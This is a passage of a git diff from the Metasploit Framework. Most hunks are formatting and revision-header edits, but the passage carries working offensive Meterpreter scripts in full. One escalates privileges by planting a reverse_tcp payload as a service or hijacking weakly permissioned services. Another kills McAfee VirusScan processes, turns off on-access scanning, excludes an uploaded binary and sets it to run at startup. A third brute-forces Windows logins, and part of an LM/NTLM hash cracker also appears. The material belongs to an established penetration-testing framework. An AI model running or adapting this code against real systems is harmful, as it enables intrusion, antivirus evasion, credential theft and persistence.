host #{rhost} and port #{rport} at #{tempexe}") +fd = client.fs.file.new(tempexe, "wb") +fd.write(exe) +fd.close + +#get handler to be ready +handler = client.framework.exploits.create("multi/handler") +handler.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp" +handler.datastore['LHOST'] = rhost +handler.datastore['LPORT'] = rport +handler.datastore['InitialAutoRunScript'] = "migrate -f" +handler.datastore['ExitOnSession'] = false +#start a handler to be ready +handler.exploit_simple( + 'Payload' => handler.datastore['PAYLOAD'], + 'RunAsJob' => true +) + +#attempt to make new service +client.railgun.kernel32.LoadLibraryA("advapi32.dll") +client.railgun.get_dll('advapi32') +client.railgun.add_function( 'advapi32', 'DeleteService','BOOL',[ + [ "DWORD", "hService", "in" ] +]) + +#SERVICE_NO_CHANGE 0xffffffff for DWORDS or NULL for pointer values leaves the current config + +print_status("Trying to add a new service...") +adv = client.railgun.advapi32 +manag = adv.OpenSCManagerA(nil,nil,0x10013) +if(manag["return"] != 0) + # SC_MANAGER_CREATE_SERVICE = 0x0002 + newservice = adv.CreateServiceA(manag["return"],"walservice","Windows Application Layer",0x0010,0X00000010,2,0,tempexe,nil,nil,nil,nil,nil) + #SERVICE_START=0x0010 SERVICE_WIN32_OWN_PROCESS= 0X00000010 + #SERVICE_AUTO_START = 2 SERVICE_ERROR_IGNORE = 0 + if(newservice["return"] != 0) + print_status("Created service... #{newservice["return"]}") + ret = adv.StartServiceA(newservice["return"], 0, nil) + print_status("Service should be started! Enjoy your new SYSTEM meterpreter session.") + service_delete("walservice") + adv.CloseServiceHandle(newservice["return"]) + if aggressive == false + adv.CloseServiceHandle(manag["return"]) + raise Rex::Script::Completed + end + else + print_status("Uhoh. service creation failed, but we should have the permissions. :-(") + end +else + print_status("No privs to create a service...") + manag = adv.OpenSCManagerA(nil,nil,1) + if(manag["return"] == 0) + print_status("Cannot open sc manager. You must have no privs at all. Ridiculous.") + end +end +print_status("Trying to find weak permissions in existing services..") +#Search through list of services to find weak permissions, whether file or config +serviceskey = "HKLM\\SYSTEM\\CurrentControlSet\\Services" +#for each service +service_list.each do |serv| + begin + srvtype = registry_getvaldata("#{serviceskey}\\#{serv}","Type").to_s + if srvtype != "16" + continue + end + moved = false + configed = false + #default path, but there should be an ImagePath registry key + source = client.fs.file.expand_path("%SYSTEMROOT%\\system32\\#{serv}.exe") + #get path to exe; parse out quotes and arguments + sourceorig = registry_getvaldata("#{serviceskey}\\#{serv}","ImagePath").to_s + sourcemaybe = client.fs.file.expand_path(sourceorig) + if( sourcemaybe[0] == '"' ) + sourcemaybe = sourcemaybe.split('"')[1] + else + sourcemaybe = sourcemaybe.split(' ')[0] + end + begin + client.fs.file.stat(sourcemaybe) #check if it really exists + source = sourcemaybe + rescue + print_status("Cannot reliably determine path for #{serv} executable. Trying #{source}") + end + #try to exploit weak file permissions + if(source != tempexe && client.railgun.kernel32.MoveFileA(source, source+'.bak')["return"]) + client.railgun.kernel32.CopyFileA(tempexe, source, false) + print_status("#{serv} has weak file permissions - #{source} moved to #{source + '.bak'} and replaced.") + moved = true + end + #try to exploit weak config permissions + #open with SERVICE_CHANGE_CONFIG (0x0002) + servhandleret = adv.OpenServiceA(manag["return"],serv,2) + if(servhandleret["return"] != 0) + #SERVICE_NO_CHANGE is 0xFFFFFFFF + if(adv.ChangeServiceConfigA(servhandleret["return"],0xFFFFFFFF,0xFFFFFFFF,0xFFFFFFFF,tempexe,nil,nil,nil,nil,nil,nil)) + print_status("#{serv} has weak configuration permissions - reconfigured to use exe #{tempexe}.") + configed = true + end + adv.CloseServiceHandle(servhandleret["return"]) + + end + if(moved != true && configed != true) + print_status("No exploitable weak permissions found on #{serv}") + continue + end + print_status("Restarting #{serv}") + #open with SERVICE_START (0x0010) and SERVICE_STOP (0x0020) + servhandleret = adv.OpenServiceA(manag["return"],serv,0x30) + if(servhandleret["return"] != 0) + #SERVICE_CONTROL_STOP = 0x00000001 + if(adv.ControlService(servhandleret["return"],1,56)) + client.railgun.kernel32.Sleep(1000) + adv.StartServiceA(servhandleret["return"],0,nil) + print_status("#{serv} restarted. You should get a system meterpreter soon. Enjoy.") + #Cleanup + if moved == true + client.railgun.kernel32.MoveFileExA(source+'.bak', source, 1) + end + if configed == true + servhandleret = adv.OpenServiceA(manag["return"],serv,2) + adv.ChangeServiceConfigA(servhandleret["return"],0xFFFFFFFF,0xFFFFFFFF,0xFFFFFFFF,sourceorig,nil,nil,nil,nil,nil,nil) + adv.CloseServiceHandle(servhandleret["return"]) + end + if aggressive == false + raise Rex::Script::Completed + end + else + print_status("Could not restart #{serv}. Wait for a reboot. (or force one yourself)") + end + adv.CloseServiceHandle(servhandleret["return"]) + else + print_status("Could not restart #{serv}. Wait for a reboot. (or force one yourself)") + end + rescue + end +end + diff --git a/scripts/meterpreter/sound_recorder.rb b/scripts/meterpreter/sound_recorder.rb index 1a6a6c75ce..f9a75fa61e 100644 --- a/scripts/meterpreter/sound_recorder.rb +++ b/scripts/meterpreter/sound_recorder.rb @@ -80,7 +80,7 @@ end } # Check for Version of Meterpreter -wrong_meter_version(meter_type) if meter_type !~ /win32|win64/i +wrong_meter_version(meter_type) if meter_type !~ /win32|win64/i # Create Folder for logs and get path for logs if not log_folder diff --git a/scripts/meterpreter/srt_webdrive_priv.rb b/scripts/meterpreter/srt_webdrive_priv.rb index dd11c7c4db..dc659d132e 100644 --- a/scripts/meterpreter/srt_webdrive_priv.rb +++ b/scripts/meterpreter/srt_webdrive_priv.rb @@ -1,4 +1,5 @@ # $Id$ +# $Revision$ ## # South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation. @@ -63,7 +64,8 @@ opts.parse(args) do |opt, idx, val| # Set correct service security descriptor to mitigate the vulnerability print_status("Setting correct security descriptor for the South River Technologies WebDrive Service.") - client.sys.process.execute("cmd.exe /c sc sdset \"#{sname}\" D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)", nil, {'Hidden' => 'true'}) + client.sys.process.execute("cmd.exe /c sc sdset \"#{sname}\" D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)", + nil, {'Hidden' => 'true'}) end end raise Rex::Script::Completed diff --git a/scripts/meterpreter/uploadexec.rb b/scripts/meterpreter/uploadexec.rb index 1c7be60da4..26ce4672e4 100644 --- a/scripts/meterpreter/uploadexec.rb +++ b/scripts/meterpreter/uploadexec.rb @@ -1,4 +1,5 @@ # $Id$ +# $Revision$ session = client @@exec_opts = Rex::Parser::Arguments.new( diff --git a/scripts/meterpreter/virtualbox_sysenter_dos.rb b/scripts/meterpreter/virtualbox_sysenter_dos.rb index 147ad65020..a472d42035 100644 --- a/scripts/meterpreter/virtualbox_sysenter_dos.rb +++ b/scripts/meterpreter/virtualbox_sysenter_dos.rb @@ -3,6 +3,8 @@ # Meterpreter script for triggering the VirtualBox DoS published at: # http://milw0rm.com/exploits/9323 +# $Revision$ + opts = Rex::Parser::Arguments.new( "-h" => [ false,"Help menu." ] ) diff --git a/scripts/meterpreter/virusscan_bypass.rb b/scripts/meterpreter/virusscan_bypass.rb old mode 100755 new mode 100644 index da0fc22ac2..33508b76e5 --- a/scripts/meterpreter/virusscan_bypass.rb +++ b/scripts/meterpreter/virusscan_bypass.rb @@ -1,205 +1,208 @@ -# Meterpreter script that kills Mcafee VirusScan Enterprise v8.7.0i+ processes in magic -# order which keeps VirusScan icon visible at system tray without disabled sign on it. -# Additionally it lets you disable On Access Scanner from registry, upload your detectable -# binary to TEMP folder, add that folder to the VirusScan exclusion list and CurrentVersion\Run -# registry key. (Requires administrator privilege. Tested on XP SP3) -# -# Credits: hdm, jduck, Jerome Athias (borrowed some of their codes) -# -# Provided by: Mert SARICA - mert.sarica [@] gmail.com - http://www.mertsarica.com - -session = client -@@exec_opts = Rex::Parser::Arguments.new( - "-h" => [ false,"Help menu." ], - "-k" => [ false,"Only kills VirusScan processes"], - "-e" => [ true,"Executable to upload to target host. (modifies registry and exclusion list)" ] -) - -################## function declaration Declarations ################## -def usage() - print_line "\nAuthor: Mert SARICA (mert.sarica [@] gmail.com) \t\tWeb: http://www.mertsarica.com" - print_line "----------------------------------------------------------------------------------------------" - print_line "Bypasses Mcafee VirusScan Enterprise v8.7.0i+, uploads an executable to TEMP folder adds it" - print_line "to exclusion list and set it to run at startup. (Requires administrator privilege)" - print_line "----------------------------------------------------------------------------------------------" - print_line(@@exec_opts.usage) -end - -@path = "" -@location = "" - -def upload(session,file,trgloc) - if not ::File.exists?(file) - raise "File to Upload does not exists!" - else - @location = session.fs.file.expand_path("%TEMP%") - begin - ext = file.scan(/\S*(.exe)/i) - if ext.join == ".exe" - fileontrgt = "#{@location}\\MS#{rand(100)}.exe" - else - fileontrgt = "#{@location}\\MS#{rand(100)}#{ext}" - end - @path = fileontrgt - print_status("Uploading #{file}....") - session.fs.file.upload_file("#{fileontrgt}","#{file}") - print_status("Uploaded as #{fileontrgt}") - rescue ::Exception => e - print_status("Error uploading file #{file}: #{e.class} #{e}") - end - end - return fileontrgt -end - -#parsing of Options -file = "" -helpcall = 0 -killonly = 0 -@@exec_opts.parse(args) { |opt, idx, val| - case opt - when "-e" - file = val || "" - when "-h" - helpcall = 1 - when "-k" - killonly = 1 - end - -} - -if killonly == 0 - if file == "" - usage - raise Rex::Script::Completed - end -end - -# Magic kill order :) -avs = %W{ - shstat.exe - engineserver.exe - frameworkservice.exe - naprdmgr.exe - mctray.exe - mfeann.exe - vstskmgr.exe - mcshield.exe -} - -av = 0 - -plist = client.sys.process.get_processes() -plist.each do |x| - if (avs.index(x['name'].downcase)) - av = av + 1 - end -end - - -if av > 6 - print_status("VirusScan Enterprise v8.7.0i+ is running...") -else - print_status("VirusScan Enterprise v8.7.0i+ is not running!") - raise Rex::Script::Completed -end - -target_pid = nil -target ||= "mfevtps.exe" - -print_status("Migrating to #{target}...") - -# Get the target process pid -target_pid = client.sys.process[target] - -if not target_pid - print_error("Could not access the target process") - raise Rex::Script::Completed -end - -print_status("Migrating into process ID #{target_pid}") -client.core.migrate(target_pid) - -target_pid = nil - -if killonly == 1 - avs.each do |x| - # Get the target process pid - target_pid = client.sys.process[x] - print_status("Killing off #{x}...") - client.sys.process.kill(target_pid) - end -else - avs.each do |x| - # Get the target process pid - target_pid = client.sys.process[x] - print_status("Killing off #{x}...") - client.sys.process.kill(target_pid) - end - - # Upload it - exec = upload(session,file,"") - - # Initiailze vars - key = nil - value = nil - data = nil - type = nil - - # Mcafee registry key - key = 'HKLM\Software\Mcafee\VSCore\On Access Scanner\MCShield\Configuration\Default' - - # Split the key into its parts - root_key, base_key = client.sys.registry.splitkey(key) - - # Disable when writing to disk option - value = "bScanIncoming" - data = 0 - type = "REG_DWORD" - open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE) - open_key.set_value(value, client.sys.registry.type2str(type), data) - print_status("Successful set #{key} -> #{value} to #{data}.") - - # Disable when reading from disk option - value = "bScanOutgoing" - data = 0 - type = "REG_DWORD" - open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE) - open_key.set_value(value, client.sys.registry.type2str(type), data) - print_status("Successful set #{key} -> #{value} to #{data}.") - - # Disable detection of unwanted programs - value = "ApplyNVP" - data = 0 - type = "REG_DWORD" - open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE) - open_key.set_value(value, client.sys.registry.type2str(type), data) - print_status("Successful set #{key} -> #{value} to #{data}.") - - # Increase the number of excluded items - value = "NumExcludeItems" - data = 1 - type = "REG_DWORD" - open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE) - open_key.set_value(value, client.sys.registry.type2str(type), data) - print_status("Successful set #{key} -> #{value} to #{data}.") - - # Add executable to excluded item folder - value = "ExcludedItem_0" - data = "3|3|" + @location - type = "REG_SZ" - open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE) - open_key.set_value(value, client.sys.registry.type2str(type), data) - print_status("Successful set #{key} -> #{value} to #{data}.") - - # Set registry to run executable at startup - key = 'HKLM\Software\Microsoft\Windows\CurrentVersion\Run' - # Split the key into its parts - root_key, base_key = client.sys.registry.splitkey(key) - value = "MS" - data = @path - open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE) - open_key.set_value(value, client.sys.registry.type2str(type), data) - print_status("Successful set #{key} -> #{value} to #{data}.") -end - -print_status("Finished!") +# $Id$ +# $Revision$ + +# Meterpreter script that kills Mcafee VirusScan Enterprise v8.7.0i+ processes in magic +# order which keeps VirusScan icon visible at system tray without disabled sign on it. +# Additionally it lets you disable On Access Scanner from registry, upload your detectable +# binary to TEMP folder, add that folder to the VirusScan exclusion list and CurrentVersion\Run +# registry key. (Requires administrator privilege. Tested on XP SP3) +# +# Credits: hdm, jduck, Jerome Athias (borrowed some of their codes) +# +# Provided by: Mert SARICA - mert.sarica [@] gmail.com - http://www.mertsarica.com + +session = client +@@exec_opts = Rex::Parser::Arguments.new( + "-h" => [ false,"Help menu." ], + "-k" => [ false,"Only kills VirusScan processes"], + "-e" => [ true,"Executable to upload to target host. (modifies registry and exclusion list)" ] +) + +################## function declaration Declarations ################## +def usage() + print_line "\nAuthor: Mert SARICA (mert.sarica [@] gmail.com) \t\tWeb: http://www.mertsarica.com" + print_line "----------------------------------------------------------------------------------------------" + print_line "Bypasses Mcafee VirusScan Enterprise v8.7.0i+, uploads an executable to TEMP folder adds it" + print_line "to exclusion list and set it to run at startup. (Requires administrator privilege)" + print_line "----------------------------------------------------------------------------------------------" + print_line(@@exec_opts.usage) +end + +@path = "" +@location = "" + +def upload(session,file,trgloc) + if not ::File.exists?(file) + raise "File to Upload does not exists!" + else + @location = session.fs.file.expand_path("%TEMP%") + begin + ext = file.scan(/\S*(.exe)/i) + if ext.join == ".exe" + fileontrgt = "#{@location}\\MS#{rand(100)}.exe" + else + fileontrgt = "#{@location}\\MS#{rand(100)}#{ext}" + end + @path = fileontrgt + print_status("Uploading #{file}....") + session.fs.file.upload_file("#{fileontrgt}","#{file}") + print_status("Uploaded as #{fileontrgt}") + rescue ::Exception => e + print_status("Error uploading file #{file}: #{e.class} #{e}") + end + end + return fileontrgt +end + +#parsing of Options +file = "" +helpcall = 0 +killonly = 0 +@@exec_opts.parse(args) { |opt, idx, val| + case opt + when "-e" + file = val || "" + when "-h" + helpcall = 1 + when "-k" + killonly = 1 + end + +} + +if killonly == 0 + if file == "" + usage + raise Rex::Script::Completed + end +end + +# Magic kill order :) +avs = %W{ + shstat.exe + engineserver.exe + frameworkservice.exe + naprdmgr.exe + mctray.exe + mfeann.exe + vstskmgr.exe + mcshield.exe +} + +av = 0 + +plist = client.sys.process.get_processes() +plist.each do |x| + if (avs.index(x['name'].downcase)) + av = av + 1 + end +end + + +if av > 6 + print_status("VirusScan Enterprise v8.7.0i+ is running...") +else + print_status("VirusScan Enterprise v8.7.0i+ is not running!") + raise Rex::Script::Completed +end + +target_pid = nil +target ||= "mfevtps.exe" + +print_status("Migrating to #{target}...") + +# Get the target process pid +target_pid = client.sys.process[target] + +if not target_pid + print_error("Could not access the target process") + raise Rex::Script::Completed +end + +print_status("Migrating into process ID #{target_pid}") +client.core.migrate(target_pid) + +target_pid = nil + +if killonly == 1 + avs.each do |x| + # Get the target process pid + target_pid = client.sys.process[x] + print_status("Killing off #{x}...") + client.sys.process.kill(target_pid) + end +else + avs.each do |x| + # Get the target process pid + target_pid = client.sys.process[x] + print_status("Killing off #{x}...") + client.sys.process.kill(target_pid) + end + + # Upload it + exec = upload(session,file,"") + + # Initiailze vars + key = nil + value = nil + data = nil + type = nil + + # Mcafee registry key + key = 'HKLM\Software\Mcafee\VSCore\On Access Scanner\MCShield\Configuration\Default' + + # Split the key into its parts + root_key, base_key = client.sys.registry.splitkey(key) + + # Disable when writing to disk option + value = "bScanIncoming" + data = 0 + type = "REG_DWORD" + open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE) + open_key.set_value(value, client.sys.registry.type2str(type), data) + print_status("Successful set #{key} -> #{value} to #{data}.") + + # Disable when reading from disk option + value = "bScanOutgoing" + data = 0 + type = "REG_DWORD" + open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE) + open_key.set_value(value, client.sys.registry.type2str(type), data) + print_status("Successful set #{key} -> #{value} to #{data}.") + + # Disable detection of unwanted programs + value = "ApplyNVP" + data = 0 + type = "REG_DWORD" + open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE) + open_key.set_value(value, client.sys.registry.type2str(type), data) + print_status("Successful set #{key} -> #{value} to #{data}.") + + # Increase the number of excluded items + value = "NumExcludeItems" + data = 1 + type = "REG_DWORD" + open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE) + open_key.set_value(value, client.sys.registry.type2str(type), data) + print_status("Successful set #{key} -> #{value} to #{data}.") + + # Add executable to excluded item folder + value = "ExcludedItem_0" + data = "3|3|" + @location + type = "REG_SZ" + open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE) + open_key.set_value(value, client.sys.registry.type2str(type), data) + print_status("Successful set #{key} -> #{value} to #{data}.") + + # Set registry to run executable at startup + key = 'HKLM\Software\Microsoft\Windows\CurrentVersion\Run' + # Split the key into its parts + root_key, base_key = client.sys.registry.splitkey(key) + value = "MS" + data = @path + open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE) + open_key.set_value(value, client.sys.registry.type2str(type), data) + print_status("Successful set #{key} -> #{value} to #{data}.") +end + +print_status("Finished!") diff --git a/scripts/meterpreter/vnc.rb b/scripts/meterpreter/vnc.rb index 010f1a4ab1..9e9795b937 100644 --- a/scripts/meterpreter/vnc.rb +++ b/scripts/meterpreter/vnc.rb @@ -1,4 +1,5 @@ # $Id$ +# $Revision$ # # Meterpreter script for obtaining a quick VNC session diff --git a/scripts/meterpreter/webcam.rb b/scripts/meterpreter/webcam.rb index e0637847dc..5111081670 100644 --- a/scripts/meterpreter/webcam.rb +++ b/scripts/meterpreter/webcam.rb @@ -2,7 +2,7 @@ # $Revision$ # Author: scriptjunkie # -# Simplify running webcam, whether grabbing a single frame or running +# Simplify running webcam, whether grabbing a single frame or running # a continous loop. @client = client @@ -66,7 +66,7 @@ begin end print_line("[*] Starting webcam #{index}: #{camlist[index - 1]}") client.webcam.webcam_start(index) - + #prepare output if(gui) sock = Rex::Socket::Udp.create( diff --git a/scripts/meterpreter/win32-sshclient.rb b/scripts/meterpreter/win32-sshclient.rb index 8b06684b38..1ce149edc3 100644 --- a/scripts/meterpreter/win32-sshclient.rb +++ b/scripts/meterpreter/win32-sshclient.rb @@ -1,6 +1,7 @@ # win32-sshclient.rb # # $Id$ +# $Revision$ # # Meterpreter script to deploy & run the "plink" commandline ssh-client # supports only MS-Windows-2k/XP/Vista Hosts diff --git a/scripts/meterpreter/win32-sshserver.rb b/scripts/meterpreter/win32-sshserver.rb index 12266ab497..902b85d893 100644 --- a/scripts/meterpreter/win32-sshserver.rb +++ b/scripts/meterpreter/win32-sshserver.rb @@ -1,6 +1,7 @@ # win32-sshserver.rb # # $Id$ +# $Revision$ # # meterpreter-script to deploy + run OpenSSH # on the target machine diff --git a/scripts/meterpreter/winbf.rb b/scripts/meterpreter/winbf.rb index 2ce1fe1328..3cc3ae5af3 100644 --- a/scripts/meterpreter/winbf.rb +++ b/scripts/meterpreter/winbf.rb @@ -4,12 +4,12 @@ #------------------------------------------------------------------------------- ################## Variable Declarations ################## @@exec_opts = Rex::Parser::Arguments.new( - "-h" => [ false, "\tHelp menu."], - "-t" => [ true, "\tTarget IP Address"], - "-p" => [ true, "\tPassword List"], - "-cp" => [ false, "\tCheck Local Machine Password Policy"], - "-L" => [ true, "\tUsername List to be brute forced"], - "-l" => [ true, "\tLogin name to be brute forced"] + "-h" => [ false, "\tHelp menu."], + "-t" => [ true, "\tTarget IP Address"], + "-p" => [ true, "\tPassword List"], + "-cp" => [ false, "\tCheck Local Machine Password Policy"], + "-L" => [ true, "\tUsername List to be brute forced"], + "-l" => [ true, "\tLogin name to be brute forced"] ) # Variables for Options user = [] @@ -66,56 +66,56 @@ end def passbf(session,passlist,target,user,opt,logfile) print_status("Running Brute force attack against #{user}") print_status("Successfull Username and Password pairs are being saved in #{logfile}") - result = [] + result = [] output = [] passfnd = 0 - a = [] + a = [] i = 0 if opt == 1 if not ::File.exists?(user) raise "Usernames List File does not exists!" - else - user = ::File.open(user, "r") - end + else + user = ::File.open(user, "r") + end end # Go thru each user user.each do |u| # Go thru each line in the password file while passfnd < 1 ::File.open(passlist, "r").each_line do |line| - begin - print_status("Trying #{u.chomp} #{line.chomp}") + begin + print_status("Trying #{u.chomp} #{line.chomp}") + + # Command for testing local login credentials + r = session.sys.process.execute("cmd /c net use \\\\#{target} #{line.chomp} /u:#{u.chomp}", nil, {'Hidden' => true, 'Channelized' => true}) + while(d = r.channel.read) + output << d + end + r.channel.close + r.close + + # Checks if password is found + result = output.to_s.scan(/The\scommand\scompleted\ssuccessfully/) + if result.length == 1 + print_status("\tUser: #{u.chomp} pass: #{line.chomp} found") + file_local_write(logfile,"User: #{u.chomp} pass: #{line.chomp}") + r = session.sys.process.execute("cmd /c net use \\\\#{target} /delete", nil, {'Hidden' => true, 'Channelized' => true}) + while(d = r.channel.read) + output << d + end + output.clear + r.channel.close + r.close + passfnd = 1 + break + end + rescue ::Exception => e + print_status("The following Error was encountered: #{e.class} #{e}") + end - # Command for testing local login credentials - r = session.sys.process.execute("cmd /c net use \\\\#{target} #{line.chomp} /u:#{u.chomp}", nil, {'Hidden' => true, 'Channelized' => true}) - while(d = r.channel.read) - output << d - end - r.channel.close - r.close - - # Checks if password is found - result = output.to_s.scan(/The\scommand\scompleted\ssuccessfully/) - if result.length == 1 - print_status("\tUser: #{u.chomp} pass: #{line.chomp} found") - file_local_write(logfile,"User: #{u.chomp} pass: #{line.chomp}") - r = session.sys.process.execute("cmd /c net use \\\\#{target} /delete", nil, {'Hidden' => true, 'Channelized' => true}) - while(d = r.channel.read) - output << d - end - output.clear - r.channel.close - r.close - passfnd = 1 - break - end - rescue ::Exception => e - print_status("The following Error was encountered: #{e.class} #{e}") - end - - end - passfnd = 1 - end + end + passfnd = 1 + end passfnd = 0 end end @@ -152,33 +152,31 @@ unsupported if client.platform !~ /win32|win64/i # Parsing of Options @@exec_opts.parse(args) { |opt, idx, val| case opt - when "-l" - user << val - ulopt = 0 - when "-L" - userlist = val - ulopt = 1 - - when "-cp" - chkpolicy(session) - exit - when "-p" - - passlist = val - if not ::File.exists?(passlist) - raise "Password File does not exists!" - end - when "-t" - target = val - when "-h" - print( - "Windows Login Brute Force Meterpreter Script\n" + - "Usage:\n" + - @@exec_opts.usage - ) - helpcall = 1 - end - + when "-l" + user << val + ulopt = 0 + when "-L" + userlist = val + ulopt = 1 + + when "-cp" + chkpolicy(session) + exit + when "-p" + + passlist = val + if not ::File.exists?(passlist) + raise "Password File does not exists!" + end + when "-t" + target = val + when "-h" + print("Windows Login Brute Force Meterpreter Script\n" + + "Usage:\n" + + @@exec_opts.usage) + helpcall = 1 + end + } # Execution of options selected @@ -191,11 +189,9 @@ elsif userlist != nil && passlist != nil && target != nil passbf(session,passlist,target,userlist,ulopt,logme(target)) elsif helpcall == 0 + print("Windows Login Brute Force Meterpreter Script\n" + + "Usage:\n" + + @@exec_opts.usage) - print( - "Windows Login Brute Force Meterpreter Script\n" + - "Usage:\n" + - @@exec_opts.usage - ) end diff --git a/scripts/meterpreter/wmic.rb b/scripts/meterpreter/wmic.rb index 8a1bd40653..b91b553545 100644 --- a/scripts/meterpreter/wmic.rb +++ b/scripts/meterpreter/wmic.rb @@ -28,7 +28,7 @@ def wmicexec(session,wmiccmds= nil) wmicfl = tmp + "\\"+ sprintf("%.5d",rand(100000)) wmiccmds.each do |wmi| print_status "running command wmic #{wmi}" - puts wmicfl + print_line wmicfl r = session.sys.process.execute("cmd.exe /c %SYSTEMROOT%\\system32\\wbem\\wmic.exe /append:#{wmicfl} #{wmi}", nil, {'Hidden' => true}) sleep(2) #Making sure that wmic finishes before executing next wmic command @@ -77,7 +77,7 @@ end def usage print_line("Windows WMIC Command Execution Meterpreter Script ") - puts @@exec_opts.usage + print_line @@exec_opts.usage print_line("USAGE:") print_line("run wmic -c \"WMIC Command Argument\"\n") print_line("NOTE:") diff --git a/scripts/shell/migrate.rb b/scripts/shell/migrate.rb index 1dd96c9e15..327fef8a3a 100644 --- a/scripts/shell/migrate.rb +++ b/scripts/shell/migrate.rb @@ -1,4 +1,5 @@ # $Id$ +# $Revision$ # # Simply print a message that migrating is not supported on CommandShell sessions... # diff --git a/scripts/shell/spawn_meterpreter.rb b/scripts/shell/spawn_meterpreter.rb index 672e8adc50..e6fa404769 100644 --- a/scripts/shell/spawn_meterpreter.rb +++ b/scripts/shell/spawn_meterpreter.rb @@ -1,4 +1,5 @@ # $Id$ +# $Revision$ # # Spawn a meterpreter session using an existing command shell session # diff --git a/tools/import_webscarab.rb b/tools/import_webscarab.rb index 10b0bff8f5..9a8ab88c49 100755 --- a/tools/import_webscarab.rb +++ b/tools/import_webscarab.rb @@ -52,7 +52,8 @@ puts("Opening database file: #{db_file}") database = SQLite3::Database.new(db_file) # Prepare the insert statement... -insert_statement = database.prepare("INSERT INTO requests(host,port,ssl,meth,path,headers,query,body,respcode,resphead,response,created) VALUES(:host,:port,:ssl,:meth,:path,:headers,:query,:body,:respcode,:resphead,:response,:created)"); +insert_statement = database.prepare("INSERT INTO requests(host,port,ssl,meth,path,headers,query,body,respcode,resphead,response,created)" + + " VALUES(:host,:port,:ssl,:meth,:path,:headers,:query,:body,:respcode,:resphead,:response,:created)"); # target hash -> Resolving dns names is soooo slow, I don't know why. So we use the # following hash as a "micro hosts", so we don't have to call getaddress each time... diff --git a/tools/list_interfaces.rb b/tools/list_interfaces.rb index 5a59f45beb..bc649e192c 100755 --- a/tools/list_interfaces.rb +++ b/tools/list_interfaces.rb @@ -1,9 +1,9 @@ #!/usr/bin/env ruby # -# $Id:$ -# $Revision:$ +# $Id$ +# $Revision$ # -# This small utility will display all the informations about the network interfaces +# This small utility will display all the informations about the network interfaces # that one can use under Windows with modules using pcaprub and having the INTERFACE option (ex: arp_poisonning, arp_sweep, ...). # To use th interface option under Windows use the Index value displayed by this tool (ex: "SET INTERFACE 1") # @@ -19,14 +19,14 @@ if RUBY_PLATFORM == "i386-mingw32" Pcap.respond_to?(:interfaces) and Pcap.respond_to?(:addresses)) $stderr.puts "Error: Looks like you are not running the latest version of pcaprub" - exit + exit end found = false Pcap.interfaces.each_with_index do |iface, i| found = true detail = Pcap.interface_info(iface) addr = Pcap.addresses(iface) - puts "#" * 70 + puts "#" * 70 puts "" puts "INDEX : " + (i + 1).to_s puts "NAME : " + detail["name"] diff --git a/tools/lm2ntcrack.rb b/tools/lm2ntcrack.rb index eba6063b9e..9ff9bdebb3 100755 --- a/tools/lm2ntcrack.rb +++ b/tools/lm2ntcrack.rb @@ -68,7 +68,7 @@ $args.parse(ARGV) { |opt, idx, val| end } -if not type +if not type usage else if pass and (not (hash or list)) @@ -77,20 +77,20 @@ else mode = PASS_MODE elsif list and hash and not pass mode = BRUTE_MODE - if not File.exist? list - $stderr.puts "[*] The passwords list file does not exist" + if not File.exist? list + $stderr.puts "[*] The passwords list file does not exist" exit end - if not File.file? list - $stderr.puts "[*] The passwords list provided is not a file" + if not File.file? list + $stderr.puts "[*] The passwords list provided is not a file" exit end - if not File.readable? list - $stderr.puts "[*] The passwords list file is not readable" + if not File.readable? list + $stderr.puts "[*] The passwords list file is not readable" exit end else - usage + usage end end @@ -112,8 +112,8 @@ elsif type == "NETNTLM2_SESSION" then end end -case type -when "HALFLM" +case type +when "HALFLM" case mode when BRUTE_MODE if not hash =~ /^([a-fA-F0-9]{16})$/ @@ -122,18 +122,18 @@ when "HALFLM" end found = false match_password = nil - File.open(list,"r") do |password_list| + File.open(list,"rb") do |password_list| password_list.each_line do |line| password = line.gsub("\r\n",'').gsub("\n",'') - if password =~ /^.{1,7}$/ + if password =~ /^.{1,7}$/ puts password - calculatedhash = CRYPT::lm_hash(password,true).unpack("H*")[0].upcase + calculatedhash = CRYPT::lm_hash(password,true).unpack("H*")[0].upcase if calculatedhash == hash.upcase found = true match_password = password break end - end + end end end if found @@ -170,7 +170,7 @@ when "HALFLM" end end -when "LM" +when "LM" case mode when BRUTE_MODE if not hash =~ /^([a-fA-F0-9]{32})$/ @@ -179,7 +179,7 @@ when "LM" end found = false match_password = nil - File.open(list,"r") do |password_list| + File.open(list,"rb") do |password_list| password_list.each_line do |line| password = line.gsub("\r\n",'').gsub("\n",'') if password =~ /^.{1,14}$/ @@ -190,7 +190,7 @@ when "LM" match_password = password break end - end + end end end if found @@ -236,7 +236,7 @@ when "NTLM" end found = false match_password = nil - File.open(list,"r") do |password_list| + File.open(list,"rb") do |password_list| password_list.each_line do |line| password = line.gsub("\r\n",'').gsub("\n",'') puts password @@ -245,7 +245,7 @@ when "NTLM" found = true match_password = password break - end + end end end if found @@ -290,7 +290,7 @@ when "HALFNETLMv1" end found = false match_password = nil - File.open(list,"r") do |password_list| + File.open(list,"rb") do |password_list| password_list.each_line do |line| password = line.gsub("\r\n",'').gsub("\n",'') if password =~ /^.{1,7}$/ @@ -304,7 +304,7 @@ when "HALFNETLMv1" match_password = password break end - end + end end end if found @@ -380,7 +380,7 @@ when "NETLMv1" end found = false match_password = nil - File.open(list,"r") do |password_list| + File.open(list,"rb") do |password_list| password_list.each_line do |line| password = line.gsub("\r\n",'').gsub("\n",'') if 